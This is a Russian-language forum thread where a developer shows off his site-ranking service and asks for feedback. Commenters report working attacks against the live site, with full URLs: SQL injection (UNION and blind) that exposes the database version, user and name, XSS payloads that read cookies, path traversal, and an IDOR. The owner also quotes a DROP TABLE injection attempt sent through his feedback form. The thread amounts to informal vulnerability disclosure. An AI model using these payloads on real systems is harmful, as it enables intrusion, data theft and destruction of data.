Сделал свой Рейтинг Сайтов (http://yandeg.ru/). В данный момент уже вполне работоспособен и пригоден для регистрации сайтов, осталось только дорисовать счетчики и подредактировать основной шаблон + устранить некоторые траблы в разделе личной статистики пользователей.

Хотелось бы послушать ваши мнения по поводу дизайна, оформления, чего нужно добавить в рейтинг или убрать из него.

Дизайн: Студия «Dexter» - cool =) Почему не сам делал ? ... А так мне понравился ...

Приколный дизз

жесть) убери этот счётчик тИЦ
или поставь хотя бы что бы показывало тИц своего сайта, а не top.dp.ru/ =)))

жесть) убери этот счётчик тИЦ
или поставь хотя бы что бы показывало тИц своего сайта, а не top.dp.ru/ =)))
Ну мне же надо чемто заинтересовать юзеров ;) пока пусть эта денюжка повесит, когда у сайта будет свой тиц нормальный то уже реальный буду отображать.

Respect! ;) Мне понравилось! Я присоеденился! :)
Leon1010 + и спасибо ;)
В данном состоянии оценка 8 из 10! (помоему регистрация глючит в опере немного... Version
9.10)

долой top's mail/rambler etc!!

Нашёл ошибку...

При выборе "скрыть статистику" - убирается линк на статистику с ID, в категории рейтингов (http://yandeg.ru/top.php). Например если статистика запрещена, а ID неизвестен - заходим на сайт, view source, копируем ID и вставляем в
_http://yandeg.ru/stat.php?id=[id]

Вот например:
http://yandeg.ru/stat.php?id=51 ; пользователь с ID:51 - скрывает статистику, но её видно.
http://yandeg.ru/stat.php?id=23 ; аналогично с ID:23 и т.д.

Нашёл ошибку...

При выборе "скрыть статистику" - убирается линк на статистику с ID, в категории рейтингов (http://yandeg.ru/top.php). Например если статистика запрещена, а ID неизвестен - заходим на сайт, view source, копируем ID и вставляем в
_http://yandeg.ru/stat.php?id=[id]

Вот например:
http://yandeg.ru/stat.php?id=51 ; пользователь с ID:51 - скрывает статистику, но её видно.
http://yandeg.ru/stat.php?id=23 ; аналогично с ID:23 и т.д.

Частично профиксил, сейчас сделаю так чтобы выводило на форму авторизации если стата недоступна.

Исправил баг со статистикой + перепотрошил все скрипты сбора статистики и постарался добиться максимального быстродействия + залотал несколько дыр в скриптах. В общем можно сказать что код "вылизал"

а вот и КСС ))
http://yandeg.ru/top.php?cat=%22%3E%3Cscript%3Ealert()%3C/script%3E

а вот и КСС ))
http://yandeg.ru/top.php?cat=%22%3E%3Cscript%3Ealert()%3C/script%3E

Спасибо, профиксил.

Движок чей-то взял или свой? На что-то похоже... А так неплохо!

НУ впринципе сайт прикольный)))Но слишком много различных элементов, связанных с графикой.

Интересно придуман каркас. Вид таблицы делает четкостью

Неплохо обеспечено функциональное предназначение страницы. Есть некоторые спорные моменты в реализации навигации.

сайт зачотный:)
есть похожие движки в паблике или продаются мож где?
подкинье названия плиз

http://yandeg.ru/stat.php?id=99+union+select+1,2,3,4,55,6,convert(v ersion()+using+cp1251),8,9,10,11,12,13,14,15,16,17 ,18,19/*
http://yandeg.ru/stat.php?id=1 and substring(version(),1,1)=4/*
version() = 4.1.15-log
user() = leon_top@localhost
database() = leon_top

http://yandeg.ru/cod.php
Введите Ваш ID:
</textarea><script>alert(document.cookie)</script>
http://yandeg.ru/count/cnt.php?id=1 and substring(version(),1,1)=4

http://yandeg.ru/cod.php
Введите Ваш ID:
</textarea><script>alert(document.cookie)</script>

Спасибо, профиксил.



http://yandeg.ru/stat.php?id=99+union+select+1,2,3,4,55,6,convert(v ersion()+using+cp1251),8,9,10,11,12,13,14,15,16,17 ,18,19/*
http://yandeg.ru/stat.php?id=1 and substring(version(),1,1)=4/*
http://yandeg.ru/count/cnt.php?id=1 and substring(version(),1,1)=4


Эмм... несовсем к сожалению понятно что из себя представляют эти строчки. ведь там ничего лишнего не отображается (никаких параметров мискли и т.п.)


Движок чей-то взял или свой? На что-то похоже... А так неплохо!
На top.mail.ru немного похоже ;)


есть похожие движки в паблике или продаются мож где?
подкинье названия плиз
В паблике есть движки рейтингов но все кто со статистикой обычно гнутся уже после 50 зареганых сайтов по причине дебильно составленного кода и структуры мискли. Поэтому если взять такой движок. то придется вносить существенные изменения во всю структуру такого скрипта (что я и сделал).
К таким относится: SilverTop, SmartTop, Tsite и т.п.
Поэтому я советую купить уже готовый и хорошо отлаженый скрипт, но подобных я еще не встречал ;)

Простенько, но со вкусом. :)

Рейтинг топ 10 как-то пусто смотрится.

Эмм... несовсем к сожалению понятно что из себя представляют эти строчки. ведь там ничего лишнего не отображается (никаких параметров мискли и т.п.)
если запрос верный, то страница отображается как надо, если неверный, то не отображается/отображается с ошибкой
http://injection.rulezz.ru/mysql_char_brute.html

а по поводу первого...
http://yandeg.ru/stat.php?id=99+union+select+1,2,3,4,55,6,convert(c oncat(0x3C68313E,version(),0x3C2F68313E)+using+cp1 251),8,9,10,11,12,13,14,15,16,17,18,19/*
без пробела

дизинг прикольный в сторону яда ты отжёг))
ЯндеГ боянь =)

2+toxa+. Спасибо, вроде все профиксил.

Начал создание новой фишки в статистике пользователей "Анализ продвижения сайта". Вот пример - http://yandeg.ru/stat.php?id=110&sort=4

Вот нашел раскрытие пути
http://yandeg.ru/stat.php?id=110&sort=4'

Ну и просто западло :)
http://yandeg.ru/stat.php?id=110&sort=../../stat

Вот нашел раскрытие пути
http://yandeg.ru/stat.php?id=110&sort=4'

Ну и просто западло :)
http://yandeg.ru/stat.php?id=110&sort=../../stat

Спасибо, профиксил.

Лично я ничего кроме стандартных безопасных вещей не нащёл :)
Например узнавание версии РНР (4) http://yandeg.ru/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
и листинга иконок http://yandeg.ru/icons/
Но это всё байан :)

Лично я ничего кроме стандартных безопасных вещей не нащёл :)
Например узнавание версии РНР (4) http://yandeg.ru/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
и листинга иконок http://yandeg.ru/icons/
Но это всё байан :)

Блин, даже и не занаю как эту хню профиксить, мучилсо мучилсо, так и не нашел решения.
В принципе эта фигню наверно фиксить то и не обязательно ибо опасности не представляет %)

Задействовал mode_rewrite, добавил пару новых функций.

Сегодня я получил странные сообщения, отправленные через форму обратной связи:

Сообщение от \'like sex (\'haha@blabla.ru).
че аще <script >alert(\"jaja\"); </script>

Сообщение от \'like sex (fsdf@dsf.ru).
dsfdf sdfsdf

Сообщение от \');drop table users;-- (fsdf@fsdf.ru).
dsfsdf sdf sdf

Даже не вооруженным взглядом видно, что какойто умник пытался запороть весь рейтинг.
И мне уже становится не по себе от вопроса, а полностью ли я защищен от таких умников???

блин, да этоже один из самых популярных рейтингов рунета! *открыл рот*

отличный сайт.
понравилось, сотрудничаем с компнией domainx, она наверное Ваша)) и типа "эта компания дает скидку, регистрируйтесь"))))))))))))

Нет, компания на самом деле не моя, знакомого. Но он любезно согласился предоставлять скидку каждому участнику.

К стате, не так давно дописал модуль комментариев к сайтам участников.
Теперь к каждому сайту (если хозяин разрешит) любой посетитель может оставлять свои комментарии. А администратор комментируемого сайта может их удалять по собственному желанию.

Респект, когда то искал что-то подобное!) Приятно удивлен!)

Обновлен дизайн рейтинга и добавлен поиск.
Заценивайте.
Особенно интересуют различные баги и дырки в поиске. Большая просьба отписать если чтото найдете.